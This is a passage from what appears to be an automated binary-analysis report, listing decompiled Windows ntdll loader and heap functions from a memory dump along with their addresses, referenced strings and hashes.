				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E01217D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E012B1582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0124D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                                                                                                                0x0121a229
                                                                                                                0x0121a231
                                                                                                                0x0121a23f
                                                                                                                0x0121a242
                                                                                                                0x0121a244
                                                                                                                0x0121a24c
                                                                                                                0x0121a255
                                                                                                                0x0121a25a
                                                                                                                0x0121a25f
                                                                                                                0x01261c76
                                                                                                                0x01261c78
                                                                                                                0x01261c7e
                                                                                                                0x01261c7f
                                                                                                                0x01261c81
                                                                                                                0x01261c82
                                                                                                                0x01261c84
                                                                                                                0x01261c89
                                                                                                                0x01261c8b
                                                                                                                0x01261c9e
                                                                                                                0x01261c9e
                                                                                                                0x01261cab
                                                                                                                0x01261cb2
                                                                                                                0x00000000
                                                                                                                0x01261cb2
                                                                                                                0x01261c8d
                                                                                                                0x01261c92
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01261c94
                                                                                                                0x01261c98
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01261c98
                                                                                                                0x0121a265
                                                                                                                0x0121a265
                                                                                                                0x0121a266
                                                                                                                0x0121a26f
                                                                                                                0x0121a270
                                                                                                                0x0121a276
                                                                                                                0x0121a277
                                                                                                                0x0121a279
                                                                                                                0x0121a27e
                                                                                                                0x0121a282
                                                                                                                0x01261db5
                                                                                                                0x01261dbb
                                                                                                                0x01261dc1
                                                                                                                0x01261dc5
                                                                                                                0x01261de4
                                                                                                                0x01261de9
                                                                                                                0x01261dc7
                                                                                                                0x01261ddc
                                                                                                                0x01261de1
                                                                                                                0x01261def
                                                                                                                0x01261df3
                                                                                                                0x01261df7
                                                                                                                0x01261dfe
                                                                                                                0x01261e06
                                                                                                                0x0121a302
                                                                                                                0x0121a308
                                                                                                                0x0121a308
                                                                                                                0x0121a288
                                                                                                                0x0121a28d
                                                                                                                0x0121a294
                                                                                                                0x01261cc1
                                                                                                                0x0121a29a
                                                                                                                0x0121a29a
                                                                                                                0x0121a29a
                                                                                                                0x0121a29f
                                                                                                                0x01261ccb
                                                                                                                0x01261cd1
                                                                                                                0x01261cd8
                                                                                                                0x01261cea
                                                                                                                0x01261cea
                                                                                                                0x01261cd8
                                                                                                                0x0121a2a9
                                                                                                                0x0121a2af
                                                                                                                0x0121a2bc
                                                                                                                0x01261cfd
                                                                                                                0x0121a2c2
                                                                                                                0x0121a2c2
                                                                                                                0x0121a2c2
                                                                                                                0x0121a2c7
                                                                                                                0x01261d07
                                                                                                                0x01261d0d
                                                                                                                0x01261d14
                                                                                                                0x01261d1f
                                                                                                                0x01261d21
                                                                                                                0x01261d2c
                                                                                                                0x01261d2c
                                                                                                                0x01261d2c
                                                                                                                0x01261d47
                                                                                                                0x01261d47
                                                                                                                0x01261d14
                                                                                                                0x0121a2cd
                                                                                                                0x0121a2d2
                                                                                                                0x0121a2d9
                                                                                                                0x01261d5a
                                                                                                                0x0121a2df
                                                                                                                0x0121a2df
                                                                                                                0x0121a2df
                                                                                                                0x0121a2e4
                                                                                                                0x01261d69
                                                                                                                0x01261d6b
                                                                                                                0x01261d76
                                                                                                                0x01261d76
                                                                                                                0x01261d76
                                                                                                                0x01261d91
                                                                                                                0x01261d91
                                                                                                                0x0121a2ea
                                                                                                                0x0121a2f0
                                                                                                                0x0121a2f5
                                                                                                                0x01261da8
                                                                                                                0x01261dad
                                                                                                                0x01261dad
                                                                                                                0x0121a2fd
                                                                                                                0x0121a300
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                • API String ID: 2994545307-2586055223
                                                                                                                • Opcode ID: 92bbd5816a8f60bc1a566e58cfef23cf3e32d566407ea54b72bfd91f51b26e8c
                                                                                                                • Instruction ID: 93075ff5c9c1c6a66e9dd751ae062507fd4ac750223f3f79d013b3b74da3c89c
                                                                                                                • Opcode Fuzzy Hash: 92bbd5816a8f60bc1a566e58cfef23cf3e32d566407ea54b72bfd91f51b26e8c
                                                                                                                • Instruction Fuzzy Hash: 765104322256829FE722DB68C845F777BE8FFE0750F180468F6558B2D5D764E840CB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01228E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 44%
                                                                                                                			E01228E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x12ed360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x12e8464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x12e5780 & 0x00000003) != 0) {
							E01275510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x12e5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0123B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x12e7984; // 0xd92c28
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x12e8464; // 0x74b10110
					 *0x12eb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01229B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x12e5780 & 0x00000005) != 0) {
						_push(_t49);
						E01275510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                                                                                                0x01228e0f
                                                                                                                0x01228e16
                                                                                                                0x01228e19
                                                                                                                0x01228e1b
                                                                                                                0x01228e21
                                                                                                                0x01228e7f
                                                                                                                0x01228e85
                                                                                                                0x01269354
                                                                                                                0x0126936c
                                                                                                                0x01269371
                                                                                                                0x0126937b
                                                                                                                0x01269381
                                                                                                                0x01269381
                                                                                                                0x0126937b
                                                                                                                0x01228e9d
                                                                                                                0x01228e9d
                                                                                                                0x01228e29
                                                                                                                0x01228e2c
                                                                                                                0x01228e38
                                                                                                                0x01228e3e
                                                                                                                0x01228e43
                                                                                                                0x01228eb5
                                                                                                                0x01228eb9
                                                                                                                0x012692aa
                                                                                                                0x012692af
                                                                                                                0x012692e8
                                                                                                                0x012692e8
                                                                                                                0x012692af
                                                                                                                0x01228eb9
                                                                                                                0x01228e45
                                                                                                                0x01228e53
                                                                                                                0x01228e5b
                                                                                                                0x01228e5f
                                                                                                                0x01228e78
                                                                                                                0x01228e78
                                                                                                                0x01228e7d
                                                                                                                0x01228ec3
                                                                                                                0x01228ecd
                                                                                                                0x01228ed2
                                                                                                                0x01228ed2
                                                                                                                0x01228ec5
                                                                                                                0x01228ec5
                                                                                                                0x00000000
                                                                                                                0x01228e7d
                                                                                                                0x01228e67
                                                                                                                0x01228ea4
                                                                                                                0x0126931a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01269320
                                                                                                                0x01228ea4
                                                                                                                0x01228e70
                                                                                                                0x01269325
                                                                                                                0x01269340
                                                                                                                0x01269345
                                                                                                                0x01269345
                                                                                                                0x01228e76
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 01269357
                                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 0126933B, 01269367
                                                                                                                • LdrpFindDllActivationContext, xrefs: 01269331, 0126935D
                                                                                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0126932A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                                                                • API String ID: 0-3779518884
                                                                                                                • Opcode ID: 94135081875e05647790642a4007509c6b8f67c876143a9e4b0da6a265dcceb2
                                                                                                                • Instruction ID: 3125a5de795dd51d3fd2503e2e06d67172ecc13b9b36fdb9b5e9c4ffad4a948e
                                                                                                                • Opcode Fuzzy Hash: 94135081875e05647790642a4007509c6b8f67c876143a9e4b0da6a265dcceb2
                                                                                                                • Instruction Fuzzy Hash: 8A41F922A70337BEEF3AAB1C984DB7DB6E4AB04258F054169F7045B152E7B0DCC08781
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 012B49A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                • API String ID: 2994545307-336120773
                                                                                                                • Opcode ID: a6b33f7a356f35c244b2d96d6008635e0daa8db8fd33e2385f32fe9b8cd384c4
                                                                                                                • Instruction ID: 93cb64db4e3de41a2ec93cbbb5ea1d84a386dae3dbcbb9f070333d0f688c5805
                                                                                                                • Opcode Fuzzy Hash: a6b33f7a356f35c244b2d96d6008635e0daa8db8fd33e2385f32fe9b8cd384c4
                                                                                                                • Instruction Fuzzy Hash: 28317932224191FFD324EB99C8D9FA777E8EF047A4F284059F606CB292D770A880C759
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01208794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E01208794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0120934A() != 0) {
								_t159 = E0127A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x12e5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01275510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x12e5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0120849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01208999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01208999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x12e5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x12e5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01212280(_t92, 0x12e86cc);
															_t94 = E012C9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E012261A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x12e5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01208A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x12e5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x12e5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0123F380(_t136, 0x11d1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01212280(_t108, 0x12e86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E012261A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E012C9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0120FFB0(_t118, _t156, 0x12e86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01239A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                                                                0x01208799
                                                                                                                0x0120879d
                                                                                                                0x012087a1
                                                                                                                0x012087a3
                                                                                                                0x012087a8
                                                                                                                0x012087c3
                                                                                                                0x012087c3
                                                                                                                0x012087c8
                                                                                                                0x012087d1
                                                                                                                0x012087d4
                                                                                                                0x012087d8
                                                                                                                0x012087e5
                                                                                                                0x012087ec
                                                                                                                0x01259bfe
                                                                                                                0x01259c00
                                                                                                                0x01259c02
                                                                                                                0x01259c08
                                                                                                                0x01259c0d
                                                                                                                0x01259c0f
                                                                                                                0x01259c14
                                                                                                                0x01259c2d
                                                                                                                0x01259c32
                                                                                                                0x01259c37
                                                                                                                0x01259c3a
                                                                                                                0x01259c3c
                                                                                                                0x01259c42
                                                                                                                0x01259c42
                                                                                                                0x01259c3c
                                                                                                                0x01259c02
                                                                                                                0x012087da
                                                                                                                0x012087df
                                                                                                                0x012087e3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012087e3
                                                                                                                0x012087f2
                                                                                                                0x00000000
                                                                                                                0x012087fb
                                                                                                                0x012087fd
                                                                                                                0x012087fe
                                                                                                                0x0120880e
                                                                                                                0x0120880f
                                                                                                                0x01208810
                                                                                                                0x01208814
                                                                                                                0x0120881a
                                                                                                                0x0120881c
                                                                                                                0x0120881f
                                                                                                                0x01208821
                                                                                                                0x01208822
                                                                                                                0x01208824
                                                                                                                0x01208826
                                                                                                                0x0120882c
                                                                                                                0x0120882e
                                                                                                                0x01259c48
                                                                                                                0x01259c48
                                                                                                                0x01208834
                                                                                                                0x01208834
                                                                                                                0x01208837
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x01208837
                                                                                                                0x0120882e
                                                                                                                0x0120883d
                                                                                                                0x01208840
                                                                                                                0x01208843
                                                                                                                0x01208846
                                                                                                                0x01208849
                                                                                                                0x0120884c
                                                                                                                0x0120884e
                                                                                                                0x01208850
                                                                                                                0x01208852
                                                                                                                0x01208854
                                                                                                                0x01208857
                                                                                                                0x012088b4
                                                                                                                0x012088b6
                                                                                                                0x012088b6
                                                                                                                0x01208859
                                                                                                                0x01208859
                                                                                                                0x01208859
                                                                                                                0x01208861
                                                                                                                0x01208866
                                                                                                                0x0120886a
                                                                                                                0x0120893d
                                                                                                                0x01208941
                                                                                                                0x00000000
                                                                                                                0x01208947
                                                                                                                0x01208947
                                                                                                                0x0120894a
                                                                                                                0x0120894c
                                                                                                                0x00000000
                                                                                                                0x01208952
                                                                                                                0x01208955
                                                                                                                0x0120895a
                                                                                                                0x0120895d
                                                                                                                0x0120895d
                                                                                                                0x0120895f
                                                                                                                0x01208961
                                                                                                                0x01208961
                                                                                                                0x01208968
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0120896a
                                                                                                                0x0120896b
                                                                                                                0x0120896e
                                                                                                                0x00000000
                                                                                                                0x01208970
                                                                                                                0x01208970
                                                                                                                0x01208970
                                                                                                                0x01208970
                                                                                                                0x01208972
                                                                                                                0x01208972
                                                                                                                0x01208974
                                                                                                                0x00000000
                                                                                                                0x0120897a
                                                                                                                0x0120897a
                                                                                                                0x0120897d
                                                                                                                0x00000000
                                                                                                                0x01208983
                                                                                                                0x01259c65
                                                                                                                0x01259c6d
                                                                                                                0x01259c72
                                                                                                                0x01259c75
                                                                                                                0x01259c75
                                                                                                                0x01259c82
                                                                                                                0x01259c86
                                                                                                                0x01259c87
                                                                                                                0x01259c88
                                                                                                                0x01259c89
                                                                                                                0x01259c8c
                                                                                                                0x01259c90
                                                                                                                0x01259c95
                                                                                                                0x01259c97
                                                                                                                0x01259ca0
                                                                                                                0x01259ca3
                                                                                                                0x01259ca9
                                                                                                                0x01259ca9
                                                                                                                0x00000000
                                                                                                                0x01259ca9
                                                                                                                0x01259ca3
                                                                                                                0x00000000
                                                                                                                0x01259c97
                                                                                                                0x0120897d
                                                                                                                0x00000000
                                                                                                                0x01208974
                                                                                                                0x01208988
                                                                                                                0x01208992
                                                                                                                0x01208996
                                                                                                                0x00000000
                                                                                                                0x01208996
                                                                                                                0x0120894c
                                                                                                                0x00000000
                                                                                                                0x01208870
                                                                                                                0x0120887b
                                                                                                                0x0120887d
                                                                                                                0x0120887f
                                                                                                                0x01208881
                                                                                                                0x01208884
                                                                                                                0x01208884
                                                                                                                0x01208886
                                                                                                                0x01208889
                                                                                                                0x0120888c
                                                                                                                0x0120888e
                                                                                                                0x01208891
                                                                                                                0x01208891
                                                                                                                0x01208898
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0120889a
                                                                                                                0x0120889b
                                                                                                                0x0120889e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012088a0
                                                                                                                0x012088a8
                                                                                                                0x012088b0
                                                                                                                0x012088b2
                                                                                                                0x012088d3
                                                                                                                0x012088d5
                                                                                                                0x00000000
                                                                                                                0x012088d7
                                                                                                                0x012088db
                                                                                                                0x012088dc
                                                                                                                0x012088e0
                                                                                                                0x012088e8
                                                                                                                0x012088ee
                                                                                                                0x012088f0
                                                                                                                0x012088f3
                                                                                                                0x012088fc
                                                                                                                0x01208901
                                                                                                                0x01208906
                                                                                                                0x0120890c
                                                                                                                0x0120890c
                                                                                                                0x0120890f
                                                                                                                0x01208916
                                                                                                                0x01208917
                                                                                                                0x01208918
                                                                                                                0x01208919
                                                                                                                0x0120891a
                                                                                                                0x0120891f
                                                                                                                0x01208921
                                                                                                                0x01259c52
                                                                                                                0x01259c55
                                                                                                                0x01259c5b
                                                                                                                0x01259cac
                                                                                                                0x01259cc0
                                                                                                                0x01259cc0
                                                                                                                0x01259c55
                                                                                                                0x01208927
                                                                                                                0x01208927
                                                                                                                0x0120892f
                                                                                                                0x01208933
                                                                                                                0x00000000
                                                                                                                0x012088f5
                                                                                                                0x012088f5
                                                                                                                0x00000000
                                                                                                                0x012088f7
                                                                                                                0x012088f7
                                                                                                                0x012088fa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012088fa
                                                                                                                0x012088f5
                                                                                                                0x012088f3
                                                                                                                0x00000000
                                                                                                                0x012088d5
                                                                                                                0x00000000
                                                                                                                0x012088b2
                                                                                                                0x012088c9
                                                                                                                0x00000000
                                                                                                                0x012088c9
                                                                                                                0x0120887f
                                                                                                                0x0120886a
                                                                                                                0x01208857
                                                                                                                0x01208852
                                                                                                                0x012088bf
                                                                                                                0x012088bf
                                                                                                                0x012087aa
                                                                                                                0x012087ad
                                                                                                                0x012087ae
                                                                                                                0x012087b4
                                                                                                                0x012087b5
                                                                                                                0x012087b6
                                                                                                                0x012087b8
                                                                                                                0x012087bd
                                                                                                                0x012087c1
                                                                                                                0x012087f4
                                                                                                                0x012087fa
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x012087c1
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01259C18
                                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 01259C28
                                                                                                                • LdrpDoPostSnapWork, xrefs: 01259C1E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000002.374251676.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                                                • API String ID: 2994545307-1948996284
                                                                                                                • Opcode ID: 8d675f7bc1c91c681b904f979c572734ec0b415a0a785b8d72e434903bdb3153
                                                                                                                • Instruction ID: 97920d6f8aefb4623b700dfb84b69a2f983c6a3b5493281f8ce13fbb1d5a6eb1
                                                                                                                • Opcode Fuzzy Hash: 8d675f7bc1c91c681b904f979c572734ec0b415a0a785b8d72e434903bdb3153
                                                                                                                • Instruction Fuzzy Hash: 25912131E2021BDFEF1ADF58D481ABBB7B5FF44314B044269DA01AB282D770AE40CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 01207E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 98%
                                                                                                                			E01207E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0120CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
